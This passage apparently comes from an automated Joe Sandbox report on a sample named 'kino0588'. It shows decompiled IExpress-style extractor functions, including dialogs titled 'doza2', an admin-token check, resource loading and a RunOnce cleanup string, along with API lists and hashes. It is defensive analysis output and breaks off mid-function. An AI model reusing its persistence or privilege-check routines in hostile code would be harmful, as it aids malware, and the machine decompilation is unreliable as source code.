
API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup3
API String ID: 3027380567-2228382463
Opcode ID: 860b4d9457b96436fa7dc42f147bc5556b915732e33053cbadc1ceb7e39aff06
Instruction ID: c43a955b3f361daec8801fa79048271f1b38a2c60e02b6d15b6af58aaadaa034
Opcode Fuzzy Hash: 860b4d9457b96436fa7dc42f147bc5556b915732e33053cbadc1ceb7e39aff06
Instruction Fuzzy Hash: B5319571A00218ABDB21AB55DC49FEA7BBCEB55700F4401EAB50DA6071EE75AF88CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B83100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00B83100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0xb88590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0xb88590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E00B843D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0xb88d4c);
					SetWindowTextA(_t33, "doza2");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0xb888b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E00B830C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00b83108
0x00b8310b
0x00b831b7
0x00b831ca
0x00b831d0
0x00b831d0
0x00b831da
0x00000000
0x00b831da
0x00b83111
0x00b83114
0x00b83136
0x00b83136
0x00b83138
0x00b8313b
0x00b83141
0x00000000
0x00b83143
0x00b83116
0x00b8311b
0x00b8314b
0x00b83151
0x00b83158
0x00b8316a
0x00b83176
0x00b8317d
0x00b8318b
0x00b8319e
0x00b831a3
0x00000000
0x00b831ad
0x00b83120
0x00000000
0x00000000
0x00b8312a
0x00b83134
0x00000000
0x00000000
0x00000000
0x00b83134
0x00b8312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 00B8313B
GetDesktopWindow.USER32 ref: 00B8314B
SetDlgItemTextA.USER32(?,00000834), ref: 00B8316A
SetWindowTextA.USER32(?,doza2), ref: 00B83176
SetForegroundWindow.USER32(?), ref: 00B8317D
GetDlgItem.USER32(?,00000834), ref: 00B83185
GetWindowLongA.USER32(00000000,000000FC), ref: 00B83190
SetWindowLongA.USER32(00000000,000000FC,00B830C0), ref: 00B831A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00B831CA

Strings

doza2, xrefs: 00B83170

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: doza2
API String ID: 3785188418-612509477
Opcode ID: 8d4ebd167cd4449b0b3c84a61f347206c7c43e15c7567e07222ad98b3840c523
Instruction ID: d2385cbb0139e294f55412c86d79c1d1007c5b10ec3b55657dfab46c8b4c34c3
Opcode Fuzzy Hash: 8d4ebd167cd4449b0b3c84a61f347206c7c43e15c7567e07222ad98b3840c523
Instruction Fuzzy Hash: A1118131244211BBEB217F64AC0CB9A3AE4FB4AF21F100662F915B21F0DF799A41C796

Uniqueness

Uniqueness Score: -1.00%

Function 00B818A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00B818A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0xb88004; // 0xfbc33aab
				_v8 = _t23 ^ _t53;
				_t25 =  *0xb88128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00B86CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E00B817EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0xb88128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0xb88128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x00b818a3
0x00b818a3
0x00b818ab
0x00b818b2
0x00b818b5
0x00b818be
0x00b818c0
0x00b818c6
0x00b818c7
0x00b818ca
0x00b818cf
0x00b819c9
0x00b819d8
0x00b819d8
0x00b818df
0x00b819b8
0x00b819bd
0x00b819bf
0x00b819bf
0x00000000
0x00b819bd
0x00b818fa
0x00000000
0x00000000
0x00b81912
0x00b819aa
0x00b819ad
0x00b819b3
0x00000000
0x00b81927
0x00b81927
0x00b81932
0x00b81936
0x00b819a9
0x00b819a9
0x00000000
0x00b819a9
0x00b8194c
0x00b819a2
0x00b819a3
0x00000000
0x00b8196e
0x00b81970
0x00b81999
0x00b8199c
0x00000000
0x00b8199c
0x00b81972
0x00b81972
0x00b81975
0x00b81984
0x00b81985
0x00b8198a
0x00000000
0x00000000
0x00000000
0x00b8198c
0x00b81991
0x00b81996
0x00000000
0x00b81996
0x00b8194c

APIs

Part of subcall function 00B817EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00B818DD), ref: 00B8181A
Part of subcall function 00B817EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00B8182C
Part of subcall function 00B817EE: AllocateAndInitializeSid.ADVAPI32(00B818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B818DD), ref: 00B81855
Part of subcall function 00B817EE: FreeSid.ADVAPI32(?,?,?,?,00B818DD), ref: 00B81883
Part of subcall function 00B817EE: FreeLibrary.KERNEL32(00000000,?,?,?,00B818DD), ref: 00B8188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00B818EB
OpenProcessToken.ADVAPI32(00000000), ref: 00B818F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00B8190A
GetLastError.KERNEL32 ref: 00B81918
LocalAlloc.KERNEL32(00000000,?,?), ref: 00B8192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00B81944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00B81964
EqualSid.ADVAPI32(00000004,?), ref: 00B8197A
FreeSid.ADVAPI32(?), ref: 00B8199C
LocalFree.KERNEL32(00000000), ref: 00B819A3
CloseHandle.KERNEL32(?), ref: 00B819AD

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 84d2ee3e839e644b2130e91ed32a7c489aedf6accc8fcddb5fed39a4350134d3
Instruction ID: 6e17404af5b89246e05f0e14ddd9ba45c205188e2b56e903eda10f8e7e37aed5
Opcode Fuzzy Hash: 84d2ee3e839e644b2130e91ed32a7c489aedf6accc8fcddb5fed39a4350134d3
Instruction Fuzzy Hash: 52311D71A01209EBEB20EFA9DC98AAFBBFCFB04750F500865E545E6170DB349906CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B8468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00B8468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x00b84699
0x00b8469b
0x00b846a9
0x00b846af
0x00b846b4
0x00b846bc
0x00b846f9
0x00000000
0x00b846f9
0x00b846d9
0x00b846dd
0x00000000
0x00000000
0x00b846e5
0x00b846ef
0x00000000
0x00b846f5
0x00b846ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846A0
SizeofResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846C3
LoadResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846CC
LockResource.KERNEL32(00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846D3
memcpy_s.MSVCRT ref: 00B846E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846EF

Strings

TITLE, xrefs: 00B8469D, 00B846C0
doza2, xrefs: 00B846E4

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$doza2
API String ID: 3370778649-4167907646
Opcode ID: 34cdc8350bf843ab89d903e7fc23ee30cc2e8b19b8e0c34a8e65740167a43fb7
Instruction ID: 7ffe518b1554745c17523c287e204a4cf21ec08a88498eefe9e6b994ec893ad8
Opcode Fuzzy Hash: 34cdc8350bf843ab89d903e7fc23ee30cc2e8b19b8e0c34a8e65740167a43fb7
Instruction Fuzzy Hash: 9F0181362442117BF3202BA56C4DF6B7E6CDBCAB62F080056FA49971B0DEA18851C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00B817EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00B817EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0xb88004; // 0xfbc33aab
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0xb8a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00B86CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x00b817f6
0x00b817fd
0x00b81805
0x00b8180b
0x00b8180d
0x00b81815
0x00b81818
0x00b81820
0x00b81824
0x00b8182c
0x00b81832
0x00b81837
0x00b81851
0x00b81854
0x00b8185d
0x00b81862
0x00b8186c
0x00b81872
0x00b81877
0x00b8187e
0x00b8187e
0x00b81883
0x00b81883
0x00b8185d
0x00b8188a
0x00b8188a
0x00b818a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00B818DD), ref: 00B8181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00B8182C
AllocateAndInitializeSid.ADVAPI32(00B818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B818DD), ref: 00B81855
FreeSid.ADVAPI32(?,?,?,?,00B818DD), ref: 00B81883
FreeLibrary.KERNEL32(00000000,?,?,?,00B818DD), ref: 00B8188A

Strings

CheckTokenMembership, xrefs: 00B81826
advapi32.dll, xrefs: 00B81810

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 60a965a2a8fdbbfd26cf36fbb25e85ecd935bbed125a2b39e2fbb11cf2700393
Instruction ID: b6a4611080f527b16e17e102f803a9bf5b18533fd634f9fe0e2aab6e581b70c9
Opcode Fuzzy Hash: 60a965a2a8fdbbfd26cf36fbb25e85ecd935bbed125a2b39e2fbb11cf2700393
Instruction Fuzzy Hash: 82116A71E01205AFD710AFA4DC4AABEBBB8EF44701F10056AF905E7260DE719D05C791

Uniqueness

Uniqueness Score: -1.00%

Function 00B83450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B83450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E00B843D0(_t24, _t12);
					SetWindowTextA(_t24, "doza2");
					SetDlgItemTextA(_t24, 0x838,  *0xb89404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0xb891dc = 1;
					goto L8;
				}
				return 0;
			}

0x00b83459
0x00b8345c
0x00b834d8
0x00b834de
0x00000000
0x00b834e0
0x00b8345e
0x00b83463
0x00b8349a
0x00b834a0
0x00b834a7
0x00b834b2
0x00b834c4
0x00b834cb
0x00000000
0x00b834cb
0x00b83468
0x00b8346e
0x00b83474
0x00000000
0x00000000
0x00b8347c
0x00b8348c
0x00b83490
0x00000000
0x00b83496
0x00b83484
0x00000000
0x00000000
0x00b83486
0x00000000
0x00b83486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00B83490
GetDesktopWindow.USER32 ref: 00B8349A
SetWindowTextA.USER32(?,doza2), ref: 00B834B2
SetDlgItemTextA.USER32(?,00000838), ref: 00B834C4
SetForegroundWindow.USER32(?), ref: 00B834CB
EndDialog.USER32(?,00000002), ref: 00B834D8

Strings

doza2, xrefs: 00B834AC

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: doza2
API String ID: 852535152-612509477
Opcode ID: 3e8e3418042e5f9d1776cc421c25eb05c999a4165400a575d360f8f039f15101
Instruction ID: 559cbbc789eb5552acf5bc5d5ef02b0d7919656fb87f44152ca0c693213cdb49
Opcode Fuzzy Hash: 3e8e3418042e5f9d1776cc421c25eb05c999a4165400a575d360f8f039f15101
Instruction Fuzzy Hash: BD01B131240114ABEB267F65DC4C96D3AE4EB06F10F084451F947A76B0CF709F51CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B82AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00B82AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0xb88004; // 0xfbc33aab
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0xb89a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00B81680(_t65, E00B817C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E00B865E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00B81680(_t65, E00B817C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00B86CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x00b82aac
0x00b82ab7
0x00b82abc
0x00b82abe
0x00b82ac3
0x00b82ac6
0x00b82ac9
0x00b82ace
0x00b82ae6
0x00b82bdc
0x00b82bdc
0x00b82be0
0x00000000
0x00000000
0x00b82af2
0x00b82afc
0x00b82b00
0x00b82b05
0x00b82b05
0x00b82b0b
0x00b82bca
0x00b82bd1
0x00b82b11
0x00b82b18
0x00b82b26
0x00b82b99
0x00b82bc8
0x00000000
0x00000000
0x00b82b9b
0x00b82bae
0x00b82bb3
0x00b82bb5
0x00b82bb5
0x00b82bb8
0x00b82bb8
0x00b82bba
0x00b82bbb
0x00000000
0x00b82bb8
0x00b82b28
0x00b82b2e
0x00b82b33
0x00b82b39
0x00b82b3c
0x00b82b3c
0x00b82b3e
0x00b82b3f
0x00b82b55
0x00b82b5d
0x00b82b64
0x00b82b64
0x00b82b7a
0x00b82b7f
0x00b82b81
0x00b82b81
0x00b82b84
0x00b82b84
0x00b82b86
0x00b82b87
0x00b82bbf
0x00b82bc1
0x00b82bc1
0x00b82b26
0x00b82bda
0x00b82bda
0x00b82be6
0x00b82be6
0x00b82bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00B82AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00B82AF2
CharNextA.USER32(?), ref: 00B82B12
CharUpperA.USER32 ref: 00B82B1E
CharPrevA.USER32(?,?), ref: 00B82B55
CharNextA.USER32(?), ref: 00B82BD4

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 174f1aac766e820aafa38c70bcda07035872d6b931ecd3307d76a877151f4581
Instruction ID: 3132e139ccf93c0ab4d5d4f6d3e1dca785cc9e096387767bf097fb5f3ec518d3
Opcode Fuzzy Hash: 174f1aac766e820aafa38c70bcda07035872d6b931ecd3307d76a877151f4581
Instruction Fuzzy Hash: 0541D2345052855EEB15BF349C54AFE7BE9DF56310F1800DAE8C297222DF358E86CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B843D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00B843D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0xb88004; // 0xfbc33aab
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00B86CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x00b843d0
0x00b843d8
0x00b843df
0x00b843e6
0x00b843ec
0x00b843f1
0x00b84400
0x00b84403
0x00b8440b
0x00b84420
0x00b84429
0x00b84437
0x00b84444
0x00b84447
0x00b8444d
0x00b84454
0x00b8445b
0x00b84460
0x00b84461
0x00b84467
0x00b8446f
0x00b84473
0x00b84473
0x00b84463
0x00b84463
0x00b84463
0x00b8447a
0x00b84481
0x00b84484
0x00b8448a
0x00b84492
0x00b84496
0x00b84496
0x00b84486
0x00b84486
0x00b84486
0x00b844b8

APIs

GetWindowRect.USER32(?,?), ref: 00B843F1
GetWindowRect.USER32(00000000,?), ref: 00B8440B
GetDC.USER32(?), ref: 00B84423
GetDeviceCaps.GDI32(00000000,00000008), ref: 00B8442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00B8443A
ReleaseDC.USER32(?,00000000), ref: 00B84447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00B844A2

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: d9546ab07b4d3ef5f110bdb6ff7b37398878c96e07cfdb4db58caf33f45478a8
Instruction ID: 5915a1e1ac9cd1dabf8607d323f26dfe01d79c13b129c9078b1161052c6dfe2d
Opcode Fuzzy Hash: d9546ab07b4d3ef5f110bdb6ff7b37398878c96e07cfdb4db58caf33f45478a8
Instruction Fuzzy Hash: E0313A72E00119AFDB14DFB8DD899EEBBB5EB89310F194169F805F7260DA70AD05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B86298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00B86298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
